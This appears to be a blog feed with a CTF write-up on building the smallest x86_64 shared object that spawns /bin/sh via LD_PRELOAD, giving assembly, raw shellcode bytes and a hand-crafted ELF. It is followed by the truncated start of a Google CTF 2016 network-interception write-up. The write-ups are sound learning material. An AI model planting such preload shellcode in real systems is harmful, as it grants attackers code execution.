Jekyll2022-11-19T20:27:14+00:00/feed.xmlPimzero’s websiteYet another technical website. // TODO: Add smart punchline heregolf.so (Plaid CTF 2020) - The race to the smallest .so2020-04-19T23:45:05+00:002020-04-19T23:45:05+00:00/2020/04/19/golf_so<h1 id="challenge">Challenge</h1>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>golf.so - Misc (500 pts)
Story:
Thinking that Bovik’s flags might be hidden in plain sight, you find on your
minimap of the Inner Sanctum that there’s a golf course tucked into the
northeast corner. Before other people catch on to the idea, you sneak off
towards the rolling grassy hills of the golf course.
As you walk up to the entrance, a small man with pointy ears pops up out of the
ground.
“Would you like to play? Right now almost nobody is here, so it’ll only be a
thousand checkers to play a round.“
You wave your hand and send the man the required amount. It’s not a lot of
money, but your balance dwindles to a paltry sum.
“Thanks! Enjoy your game.“
A golf club appears in your hand along with a ball that looks suspiciously too
large. The start of the first hole beckons, and you stride over to tee off.
Problem Details
golf.so.pwni.ng
putter (250 pts)
driver (250 pts)
</code></pre></div></div>
<h1 id="foreword">Foreword</h1>
<p>You can skip to section <a href="#136-bytes---back-to-binutils">136 bytes - back to
binutils</a> if you want the solution; otherwise
you will see the step by step progress leading to this solution.</p>
<p>I want to thank my teammates of team <a href="https://lse.epita.fr">LSE</a>, who helped me
a lot for this challenge, and in particular
<a href="https://github.com/zionlion67">bitz</a> and <a href="https://github.com/zuh0">zuh0</a>.</p>
<p>I’m quite happy about how this challenge turned out for us, because even if we
didn’t finished first on the global leaderboard, at least we finished first on
a leaderboard :)</p>
<p><img src="/assets/img/2020-04-19_18:50:46.png" alt="" /></p>
<h1 id="the-challenge">The challenge</h1>
<p>The challenge consists in a website on which we can upload a .so for <code class="language-plaintext highlighter-rouge">x86_64</code>.</p>
<p>The description on the page is as such:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Upload a 64-bit ELF shared object of size at most 1024 bytes. It should spawn a shell (execute execve("/bin/sh", ["/bin/sh"], ...)) when used like
LD_PRELOAD=<upload> /bin/true
</code></pre></div></div>
<h1 id="the-plan">The plan</h1>
<p>So right ahead I think about how we can operate:</p>
<ul>
<li>Start by writing a small asm stub that <code class="language-plaintext highlighter-rouge">execve("/bin/sh")</code></li>
<li>Put the entry point of this stub in the ELF’s constructor</li>
<li>Try to trim the ld script for .so</li>
<li>Then try to fiddle with <code class="language-plaintext highlighter-rouge">strip</code> and <code class="language-plaintext highlighter-rouge">objcopy</code> to remove clutter</li>
</ul>
<p>If those step don’t make an ELF smaller that 1024 bytes, we would be left with
no other choice than edit/create the ELF by hand.</p>
<h2 id="tricking-binutils-and-gcc">Tricking binutils and gcc</h2>
<p>First let’s write a simple asm file that does <code class="language-plaintext highlighter-rouge">execve("/bin/sh", ["/bin/sh"])</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/syscall.h>
f:
mov $0x68732f6e69622f, %rax // "/bin/sh" string
push %rax
mov %rsp, %rdi
push $0
push %rdi
push $0
lea 8(%rsp), %rsi
xor %rdx, %rdx
mov $__NR_execve, %rax
syscall
.size f, .-f
.section .init_array,"aw"
.quad f
</code></pre></div></div>
<p>And a little makefile to help us:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>libgolf.so: ASFLAGS += -fpic
libgolf.so: golf.o
%.so:
$(LINK.c) -shared $^ $(LDLIBS) -o $@
</code></pre></div></div>
<p>And for fun let’s look at the size of the library generated:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make
cc -fpic -c -o golf.o golf.S
cc -fpic -shared golf.o -o libgolf.so
$ stat -c "%s %n" libgolf.so
15408 libgolf.so
</code></pre></div></div>
<p>Ok, so we have to reduce the file size more that 15 time; let’s dive in.</p>
<p>We made the assumption that most of the “garbage” will come from our link.
This assumption is justified by the difference of size between our .o and our
.so. So we took the linker script bundled with our binutils (<code class="language-plaintext highlighter-rouge">elf_x86_64.xs</code>)
distribution and striped it of everything I didn’t understand/need.</p>
<p>I ended with a linker script as such:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Script for -shared */
/* Copyright (C) 2014-2020 Free Software Foundation, Inc.
Copying and distribution of this script, with or without modification,
are permitted in any medium without royalty provided the copyright
notice and this notice are preserved. */
OUTPUT_FORMAT("elf64-x86-64", "elf64-x86-64",
"elf64-x86-64")
OUTPUT_ARCH(i386:x86-64)
SECTIONS
{
/* Read-only sections, merged into text segment: */
. = SEGMENT_START("text-segment", 0) + SIZEOF_HEADERS;
.init_array :
{
KEEP (*(SORT_BY_INIT_PRIORITY(.init_array.*)))
KEEP (*(.init_array EXCLUDE_FILE (*crtbegin.o *crtbegin?.o *crtend.o
*crtend?.o ) .ctors))
}
}
</code></pre></div></div>
<p>Trying it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ stat -c "%s %n" golf.o # Let's look at the size of our source object
928
$ make -B LDFLAGS=-Wl,-Tlds.lds
cc -fpic -c -o golf.o golf.S
cc -fpic -Wl,-Tlds.lds -shared golf.o -o libgolf.so
$ stat -c "%s %n" libgolf.so
4688 libgolf.so
</code></pre></div></div>
<p>We also used some other flags to reduce the file size:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">-Wl,--build-id=none</code></li>
<li><code class="language-plaintext highlighter-rouge">-nostdlib</code></li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make -B LDFLAGS='-Wl,-Tlds.lds -nostdlib -Wl,--build-id=none'
1672 libgolf.so
</code></pre></div></div>
<p>Also <code class="language-plaintext highlighter-rouge">strip</code>ed our binary and removed useless sections with <code class="language-plaintext highlighter-rouge">objcopy</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strip libgolf.so
$ stat -c "%s" libgolf.so
1224
$
$ # Those sections are removed as removing them don't make the .so to crash
$ for i in .gnu.hash .init_array .dynstr .dynsym; do
> objcopy --remove-section $i libgolf.so
> stat -c "%s" libgolf.so
> done
1144 .gnu.hash
1064 .init_array
992 .dynstr
920 .dynsym
</code></pre></div></div>
<p>Nice, challenge finished, isn’t it ? Let’s upload the file…</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You made it to level 0: non-trivial! You have 420 bytes left to be considerable.
This effort is worthy of 0/2 flags.
</code></pre></div></div>
<p>Damn! We have to be under 500 bytes now ?</p>
<p>It’s becoming harder and harder to tweak our tools to make the smallest
binary, we may have to craft our library by hand. However there is still one
easy way to reduce the ELF’s size: we can trim the end of the binary and pray
that it still loads.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ dd if=libgolf.so of=l.so bs=1 count=500
$ LD_PRELOAD=./l.so /bin/true
sh-5.0$
</code></pre></div></div>
<p>Thankfully, it still loads, so we’ve made it to the next level. Will our efforts
be rewarded by a flag ?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You made it to level 1: considerable! You have 200 bytes left to be thoughtful.
This effort is worthy of 0/2 flags.
</code></pre></div></div>
<p>Sadly, this <code class="language-plaintext highlighter-rouge">dd</code> trick doesn’t work for a size of 300 bytes (on my machine it
stops loading if we keep less that 460 bytes). We will need to craft our own
binary.</p>
<h1 id="elf-crafting">Elf crafting</h1>
<p>Let’s look at what we our library before playing with <code class="language-plaintext highlighter-rouge">dd</code> in last section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -a libgolf.so
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0xb0
Start of program headers: 64 (bytes into file)
Start of section headers: 600 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 2
Size of section headers: 64 (bytes)
Number of section headers: 5
Section header string table index: 4
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .text PROGBITS 00000000000000b0 000000b0
0000000000000024 0000000000000000 AX 0 0 1
[ 2] .rela.dyn RELA 0000000000000118 00000118
0000000000000018 0000000000000018 A 0 0 8
[ 3] .dynamic DYNAMIC 0000000000000130 00000130
0000000000000100 0000000000000010 WA 0 0 8
[ 4] .shstrtab STRTAB 0000000000000000 00000230
0000000000000024 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
l (large), p (processor specific)
There are no section groups in this file.
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000230 0x0000000000000230 RWE 0x1000
DYNAMIC 0x0000000000000130 0x0000000000000130 0x0000000000000130
0x0000000000000100 0x0000000000000100 RW 0x8
Section to Segment mapping:
Segment Sections...
00 .text .rela.dyn .dynamic
01 .dynamic
Dynamic section at offset 0x130 contains 12 entries:
Tag Type Name/Value
0x0000000000000019 (INIT_ARRAY) 0x230
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0xf8
0x0000000000000005 (STRTAB) 0xf0
0x0000000000000006 (SYMTAB) 0xd8
0x000000000000000a (STRSZ) 1 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000007 (RELA) 0x118
0x0000000000000008 (RELASZ) 24 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000006ffffff9 (RELACOUNT) 1
0x0000000000000000 (NULL) 0x0
Relocation section '.rela.dyn' at offset 0x118 contains 1 entry:
Offset Info Type Sym. Value Sym. Name + Addend
000000000230 000000000008 R_X86_64_RELATIVE b0
The decoding of unwind sections for machine type Advanced Micro Devices X86-64
is not currently supported.
No version information found in this file.
</code></pre></div></div>
<p>Now we need to know what we are going to keep.</p>
<p>Obviously, we need to keep our payload.</p>
<p>We know that we can get rid of the section headers, they are useless in our use
case.</p>
<p>We need those 2 program headers.</p>
<p>We can improve here and there in the Dynamic section:</p>
<ul>
<li>Use a <code class="language-plaintext highlighter-rouge">DT_INIT</code> entry instead of <code class="language-plaintext highlighter-rouge">DT_INIT_ARRAY</code> and <code class="language-plaintext highlighter-rouge">DT_INIT_ARRAYSZ</code> +
function pointer array</li>
<li><code class="language-plaintext highlighter-rouge">DT_GNU_HASH</code>, <code class="language-plaintext highlighter-rouge">DT_STRTAB</code>, <code class="language-plaintext highlighter-rouge">DT_SYMTAB</code>, <code class="language-plaintext highlighter-rouge">DT_STRSZ</code> and <code class="language-plaintext highlighter-rouge">DT_SYMENT</code> seem
useless, we probably can get rid of them</li>
<li>We thought that we needed a reloc for the <code class="language-plaintext highlighter-rouge">DT_INIT</code> function pointer, in
order to point to the beginning of our payload once relocated, so we kept
<code class="language-plaintext highlighter-rouge">DT_RELA</code>, <code class="language-plaintext highlighter-rouge">DT_RELASZ</code>and <code class="language-plaintext highlighter-rouge">DT_RELAENT</code></li>
</ul>
<p>We thought that we needed a relocation (which was a wrong assumption, as we will
see later).</p>
<p>I started writing a program that took our current ELF and rewrote it only
keeping the parts we needed, but in the end I changed this code to write an ELF
from scratch, as it was simpler.</p>
<p>The expected size of the binary with this is as follow:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1 Ehdr: 64
2 Phdr: 2 * 56 = 112
5 Dyn: 5 * 16 = 80
1 Rela: 24
= 280 + sizeof(payload)
</code></pre></div></div>
<p>Also, let’s change our payload to something more compact:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <sys/syscall.h>
.global payload
payload:
pushq $__NR_execve
pop %rax
movabs $0x68732f6e69622f,%rbx
cltd
push %rbx
push %rsp
pop %rdi
push %rdx
push %rdi
push %rsp
pop %rsi
syscall
</code></pre></div></div>
<p>We tried to remove the <code class="language-plaintext highlighter-rouge">argv</code> setup for <code class="language-plaintext highlighter-rouge">execve</code>, as it is set to the <code class="language-plaintext highlighter-rouge">argv</code>
used to run the program, and it should be ignored by linux and the shell, but
the challenge checks it.</p>
<p><img src="/assets/img/2020-04-18_043804.png" alt="" /></p>
<p>Anyways, this solution should make a binary a bit over 300 bytes, but I’m sure
we would be able to optimized it later.</p>
<p>So we tried to write the code and we hit some road blocks:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">ld.so</code> segfaults in <code class="language-plaintext highlighter-rouge">_dl_relocate_object</code> because it wants a <code class="language-plaintext highlighter-rouge">DT_STRTAB</code></li>
<li>then it fails because it needs a <code class="language-plaintext highlighter-rouge">DT_SYMTAB</code></li>
</ul>
<p>Those were quickly found and fixed once we built a <code class="language-plaintext highlighter-rouge">ld.so</code> with debug symbols
(after spending <em>way</em> too much time trying to reverse <code class="language-plaintext highlighter-rouge">ld.so</code>).</p>
<p>So we fixed them, but our binary was still segfaulting… But looking at the
coredump, the segfault happens on the jump to our code. In the glibc, we were
here in <code class="language-plaintext highlighter-rouge">call_init</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> DL_CALL_DT_INIT(l, l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr, argc, argv, env);
</code></pre></div></div>
<p>See the <code class="language-plaintext highlighter-rouge">l->l_addr + l->l_info[DT_INIT]->d_un.d_ptr</code> ? It is adding the address
of the library to <code class="language-plaintext highlighter-rouge">l->l_info[DT_INIT]->d_un.d_ptr</code>, which has a relocation to
point to the beginning of our code.</p>
<p>In other words, <code class="language-plaintext highlighter-rouge">l->l_info[DT_INIT]->d_un.d_ptr = code_offset + l->l_addr</code>, so
we jump to <code class="language-plaintext highlighter-rouge">2 * l->l_addr + code_offset</code>, which is bogus, instead of
<code class="language-plaintext highlighter-rouge">l->l_addr + code_offset</code>. Moving the relocation away of the <code class="language-plaintext highlighter-rouge">DT_INIT</code> makes
our binary work.</p>
<p>This revelation changes lots of things: We don’t need relocations, so we can
drop most of our Dynamic entries. We can make a file under 300 bytes, as we now
only need <code class="language-plaintext highlighter-rouge">DT_INIT</code> and <code class="language-plaintext highlighter-rouge">DT_NULL</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1 Ehdr: 64
2 Phdr: 2 * 56 = 112
4 Dyn: 4 * 16 = 64
= 240 + sizeof(pyaload)
</code></pre></div></div>
<p>The code:</p>
<pre><code class="language-C">#include <elf.h>
#include <unistd.h>
char shellcode[] = {
0x6a, 0x3b, // pushq $0x3b
0x58, // pop %rax
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
0x73, 0x68, 0x00, // movabs $0x68732f6e69622f,%rbx
0x99, // cltd
0x53, // push %rbx
0x54, // push %rsp
0x5f, // pop %rdi
0x52, // push %rdx
0x57, // push %rdi
0x54, // push %rsp
0x5e, // pop %rsi
0x0f, 0x05, // syscall
};
int main() {
Elf64_Ehdr ehdr = {
.e_ident = {
[EI_MAG0] = ELFMAG0,
[EI_MAG1] = ELFMAG1,
[EI_MAG2] = ELFMAG2,
[EI_MAG3] = ELFMAG3,
[EI_CLASS] = ELFCLASS64,
[EI_DATA] = ELFDATA2LSB,
[EI_VERSION] = EV_CURRENT,
[EI_OSABI] = ELFOSABI_SYSV,
},
.e_type = ET_DYN,
.e_machine = EM_X86_64,
.e_version = EV_CURRENT,
.e_ehsize = sizeof(Elf64_Ehdr),
.e_phentsize = sizeof(Elf64_Phdr),
};
ehdr.e_shstrndx = SHN_UNDEF;
ehdr.e_shoff = 0;
ehdr.e_shnum = 0;
ehdr.e_phoff = sizeof(ehdr);
ehdr.e_phnum = 2;
Elf64_Phdr phdrs[] = {
{
.p_type = PT_LOAD,
.p_flags = PF_X|PF_W|PF_R,
.p_align = 0x1000,
},
{
.p_type = PT_DYNAMIC,
.p_flags = PF_W|PF_R,
.p_align = 0x8,
},
};
size_t code =
sizeof(ehdr) +
sizeof(phdrs);
size_t code_end = code + sizeof(shellcode);
phdrs[1].p_vaddr = code_end;
phdrs[1].p_offset = code_end;
phdrs[1].p_paddr = code_end;
enum {
DYN_INIT,
DYN_STRTAB,
DYN_SYMTAB,
DYN_NULL,
};
Elf64_Dyn dyn[] = {
[DYN_INIT] = {
.d_tag = DT_INIT,
},
[DYN_STRTAB] = { // 4
.d_tag = DT_STRTAB,
},
[DYN_SYMTAB] = { // 5
.d_tag = DT_SYMTAB,
},
[DYN_NULL] = {
.d_tag = DT_NULL,
}
};
phdrs[1].p_filesz = sizeof(dyn);
phdrs[1].p_memsz = sizeof(dyn);
dyn[DYN_STRTAB].d_un.d_val = code_end + sizeof(dyn) - sizeof(*dyn);
dyn[DYN_SYMTAB].d_un.d_val = code_end + sizeof(dyn) - sizeof(*dyn);
dyn[0].d_un.d_val = code;
ehdr.e_entry = code;
phdrs[0].p_memsz = code_end + sizeof(dyn);
phdrs[0].p_filesz = code_end + sizeof(dyn);
write(1, &ehdr, sizeof(ehdr));
write(1, phdrs, sizeof(phdrs));
write(1, shellcode, sizeof(shellcode));
write(1, dyn, sizeof(dyn)
- sizeof(*dyn) /* we dont need DT_NULL in the file :) */
- 8 - 2 /* those are 0 bytes at the end for no reason :) */);
}
</code></pre>
<p>As you can see, we did some small optimisations, like trimming the <code class="language-plaintext highlighter-rouge">'\0'</code> bytes
at the end in the ELF.</p>
<p>Once again, we test it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make do_golf
cc do_golf.c -o do_golf
$ ./do_golf > ./libgolf.so
$ stat -c "%s" libgolf.so
237
$ LD_PRELOAD=./libgolf.so /bin/true
sh-5.0$
</code></pre></div></div>
<p>Uploading it to the server gives us this result:</p>
<p><img src="/assets/img/2020-04-19_23:58:37.png" alt="" /></p>
<p>Yes! We have the first flag! But now it is time to get serious.</p>
<h1 id="136-bytes---back-to-binutils">136 bytes - back to binutils</h1>
<p>Let’s recap what do we need:</p>
<ul>
<li>1 <code class="language-plaintext highlighter-rouge">Ehdr</code></li>
<li>2 <code class="language-plaintext highlighter-rouge">Phdr</code>: <code class="language-plaintext highlighter-rouge">PT_LOAD</code> and <code class="language-plaintext highlighter-rouge">PT_DYNAMIC</code></li>
<li>4 <code class="language-plaintext highlighter-rouge">Dyn</code>: <code class="language-plaintext highlighter-rouge">DT_INIT</code>, <code class="language-plaintext highlighter-rouge">DT_STRTAB</code>, <code class="language-plaintext highlighter-rouge">DT_SYMTAB</code> and <code class="language-plaintext highlighter-rouge">DT_NULL</code></li>
<li>and our payload</li>
</ul>
<p>Now we’re going to write our binary by hand, as we will have to twiddle our bits
to the max. We’re going to use our assembler and have lots of fun in
hexadecimal.</p>
<p>Each of them is allowed to overlap. The Dynamic section (and our payload, but
we don’t use this feature here) is read once loaded in memory, so we can truncate
its <code class="language-plaintext highlighter-rouge">'\0'</code> bytes if it is at the end of the file. We can leverage this to win 31
bytes because the last entry, <code class="language-plaintext highlighter-rouge">DT_NULL</code> is only 0, and both <code class="language-plaintext highlighter-rouge">ST_STRTAB</code> and
<code class="language-plaintext highlighter-rouge">DT_SYMTAB</code> end with 15 bytes of <code class="language-plaintext highlighter-rouge">'\0'</code> (7 bytes because the tag is 5 or 6, and 8 because <code class="language-plaintext highlighter-rouge">d_val</code> is ignored).</p>
<p>Now we want to look how we can alias our Headers:</p>
<p><code class="language-plaintext highlighter-rouge">Ehdr</code>:</p>
<ul>
<li>The first 24 bytes can’t be changed (<code class="language-plaintext highlighter-rouge">e_ident</code>, <code class="language-plaintext highlighter-rouge">e_type</code>, <code class="language-plaintext highlighter-rouge">e_machine</code> and
<code class="language-plaintext highlighter-rouge">e_version</code>)</li>
<li><code class="language-plaintext highlighter-rouge">e_phoff</code>, <code class="language-plaintext highlighter-rouge">e_phentsize</code> and <code class="language-plaintext highlighter-rouge">e_phnum</code> are required also</li>
<li>the rest is ignored</li>
</ul>
<p>Both <code class="language-plaintext highlighter-rouge">Phdr</code> need their <code class="language-plaintext highlighter-rouge">p_type</code>.</p>
<p>For the <code class="language-plaintext highlighter-rouge">PT_DYNAMIC</code> Program header:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">p_vaddr</code> must hold the offset of our <code class="language-plaintext highlighter-rouge">Dyn</code> array in the file</li>
<li><code class="language-plaintext highlighter-rouge">p_filesz</code> must not be null</li>
</ul>
<p>For the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> Program header:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">p_flags</code> is required</li>
<li><code class="language-plaintext highlighter-rouge">p_offset</code> and <code class="language-plaintext highlighter-rouge">p_vaddr</code> must aligned on <code class="language-plaintext highlighter-rouge">p_align</code></li>
<li><code class="language-plaintext highlighter-rouge">p_align</code> must be 0 or a power of 2</li>
</ul>
<p>And finally for our Dynamic section, only <code class="language-plaintext highlighter-rouge">DT_INIT</code> has a meaningful <code class="language-plaintext highlighter-rouge">d_val</code>.</p>
<p>So my plan is to put the <code class="language-plaintext highlighter-rouge">Phdr</code> at offset 24, inside the <code class="language-plaintext highlighter-rouge">Ehdr</code>, and the Dynamic
section inside the <code class="language-plaintext highlighter-rouge">Phdr</code>. Then we put the Dynamic section in the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> <code class="language-plaintext highlighter-rouge">Phdr</code> and
truncate its last <code class="language-plaintext highlighter-rouge">'\0'</code> bytes. One source file is worth a thousand word so here
is the source file with the aliasing explained in the comments.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ehdr:
.byte 0x7f, 0x45, 0x4c, 0x46 // ei_mag
.byte 0x02 // EI_CLASS
.byte 0x01 // EI_DATA
.byte 0x01 // EI_VERSION
.byte 0x00 // EI_OSABI
.byte 0x00 // EI_ABIVERSION
.byte 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 // EI_NIDENT
.byte 0x03, 0x00 // e_type
.byte 0x3e, 0x00 // e_machine
.byte 0x01, 0x00 // e_version
.byte 0x00, 0x00 // e_version
phdr:
phdr_dyn:
.long 0x02 // p_type = PT_DYNAMIC // e_entry ignored
.long 0x00 // p_offset = 0 // e_entry ignored
.quad phdr - ehdr // p_vaddr = ignored // e_phoff = phdr
.quad dyn - ehdr // p_vaddr = dyn // e_shoff = ignored
next:
// p_paddr = ignored // e_flags = ignored
pop %rsi
syscall
nop
.byte 0x00, 0x00 // p_paddr = ignored // e_ehsize = ignored
.byte 0x38, 0x00 // p_paddr = ignored // e_phentsize = 0x38
.byte 0x02, 0x00 // p_filesz = ingored* // e_phnum = 2
/*
* This code aliases over:
* - e_shentsize, e_shnum, e_shstrndx
* - p_memsz, p_flags, p_align
* and jumps back to next when we have no more space in the Phdr.
* We are glad to have so much contiguous space for the big movabs insn
*/
code:
pushq $0x3b
pop %rax
movabs $0x68732f6e69622f,%rbx
cltd
push %rbx
push %rsp
pop %rdi
push %rdx
push %rdi
push %rsp
jmp next
phdr_load:
.long 0x01 // p_type = PT_LOAD
.long 0x07 // p_flags = anything | 0x7
dyn:
dyn_strtab:
.quad 0x05 // p_offset = ignored // d_tag = DT_STRTAB
.quad 0x05 // p_vaddr = p_offset // d_val = ignored
dyn_init:
.quad 0x0c // p_paddr = ignored // d_tag = DT_INIT
.quad code - ehdr // p_filesz = ignored // d_val = code
dyn_symtab:
.quad 0x06 // p_memsz = ignored // d_tag = DT_SYMTAB
.quad 0x00 // p_align // d_val = ignored
</code></pre></div></div>
<p>(And <a href="/assets/golf.so.html">here</a> is an interactive visualisation
of the binary)</p>
<p>Testing it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make elf.o
cc -c -o elf.o elf.S
$ objcopy -O binary elf.o elf.so
$ stat -c "%s" elf.so
136
$ LD_PRELOAD=./elf.so ls
sh-5.0$
</code></pre></div></div>
<p>And now on the site:</p>
<p><img src="/assets/img/2020-04-19_23:16:33.png" alt="" /></p>
<p>:)</p>
<h1 id="the-end-">The end ?</h1>
<p>We went from a 15408 byte binary to a 136 byte one. That’s over 100 times
smaller.</p>
<p>Is 136 bytes the smallest .so possible for this challenge ?</p>
<p>While we need at least 2 <code class="language-plaintext highlighter-rouge">Phdr</code> and 1 <code class="language-plaintext highlighter-rouge">Ehdr</code> in the file (sadly we can’t trim
their trailing <code class="language-plaintext highlighter-rouge">\0</code>) so the minimum size would be <code class="language-plaintext highlighter-rouge">min(sizeof(Elf64_Ehdr), 2 *
sizeof(Elf64_Phdr))</code>, which is 112 bytes.</p>
<p>However, we have to alias <code class="language-plaintext highlighter-rouge">Phrd</code>s inside <code class="language-plaintext highlighter-rouge">Ehdr</code> so their fields are compatible.
The issue is that the 24 first bytes of Ehdr can’t be changed. It leaves us with
a size of <code class="language-plaintext highlighter-rouge">24 + 2 * sizeof(Elf64_Phdr) = 136</code>.</p>
<p>One can argue that we can move the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> Phdr in first so we use
<code class="language-plaintext highlighter-rouge">e_version</code> for <code class="language-plaintext highlighter-rouge">p_type</code> and so on, but while it makes a valid elf 4 byte smaller,
it won’t load because <code class="language-plaintext highlighter-rouge">e_phoff</code> aliases with <code class="language-plaintext highlighter-rouge">p_offset</code> of the <code class="language-plaintext highlighter-rouge">PT_LOAD</code> Phdr,
thus ld.so fails on <code class="language-plaintext highlighter-rouge">mmap</code>. So this is where the record stands today.</p>ChallengeOpabina Regalis (Google CTF 2016)2016-05-02T21:52:19+00:002016-05-02T21:52:19+00:00/2016/05/02/opabina_regalis<p>(Google Capture The Flag, Networking category)</p>
<h2 id="token-fetch-network-50">Token Fetch (Network 50)</h2>
<p>There are a variety of client side machines that have access to certain
websites we’d like to access. We have a system in place, called “Opabina
Regalis” where we can intercept and modify HTTP requests on the fly. Can you
implement some attacks to gain access to those websites?</p>
<p>Opabina Regalis makes use of
<a href="https://developers.google.com/protocol-buffers/">Protocol Buffers</a> to send a
short snippet of the HTTP request for modification.</p>
<p>Here’s the protocol buffer definition used:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package main;
message Exchange {
enum VerbType {
GET = 0;
POST = 1;
}
message Header {
required string key = 1;
required string value = 2;
}
message Request {
required VerbType ver = 1; // GET
required string uri = 2; // /blah
repeated Header headers = 3; // Accept-Encoding: blah
optional bytes body = 4;
}
message Reply {
required int32 status = 1; // 200 or 302
repeated Header headers = 2;
optional bytes body = 3;
}
oneof type {
Request request = 1;
Reply reply = 2;
}
}
</code></pre></div></div>
<p>The network protocol uses a 32-bit little endian integer representing the
length of the marshalled protocol buffer, followed by the marshalled protocol
buffer.</p>
<p>Listening on port 1876 on ssl-added-and-removed-here.ctfcompetition.com</p>
<hr />
<p>This challenge is the first of the <strong>Network</strong> category, and we need to solve
it in order to unlock the rest of the catgory.</p>
<p>Before starting, we need to know that protobuf is a serialization protocol
developped by Google. We have to compile the protocol buffer definiton in order
to use it with our language.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ protoc dewff.proto --python_out=./
$ ls
def.proto def_pb2.py
</code></pre></div></div>
<p>Then we can start coding for this step:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The network protocol uses a 32-bit little endian integer representing the
length of the marshalled protocol buffer, followed by the marshalled protocol
buffer.
</code></pre></div></div>
<p>The easier way is to use construct:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">construct</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">CTFMessage</span> <span class="o">=</span> <span class="n">Struct</span><span class="p">(</span><span class="s">"CTFMessage"</span><span class="p">,</span>
<span class="n">ULInt32</span><span class="p">(</span><span class="s">"length"</span><span class="p">),</span>
<span class="n">Bytes</span><span class="p">(</span><span class="s">"data"</span><span class="p">,</span> <span class="k">lambda</span> <span class="n">ctx</span><span class="p">:</span> <span class="n">ctx</span><span class="p">.</span><span class="n">length</span><span class="p">)</span>
<span class="p">)</span>
<span class="c1"># Make a message respect the protocol
</span><span class="k">def</span> <span class="nf">buildCtfMessage</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="k">return</span> <span class="n">CTFMessage</span><span class="p">.</span><span class="n">build</span><span class="p">(</span><span class="n">Container</span><span class="p">(</span><span class="n">length</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">),</span> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">))</span>
</code></pre></div></div>
<p>The we needed to make a toolbox in order to abstract the protocol buffer:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">def_pb2</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c1"># Build a header for a request or a reply
# this is just a helper function, we don't have to use it in the solution
</span><span class="k">def</span> <span class="nf">makeHeader</span><span class="p">(</span><span class="n">i</span><span class="p">):</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">Exchange</span><span class="p">.</span><span class="n">Header</span><span class="p">()</span>
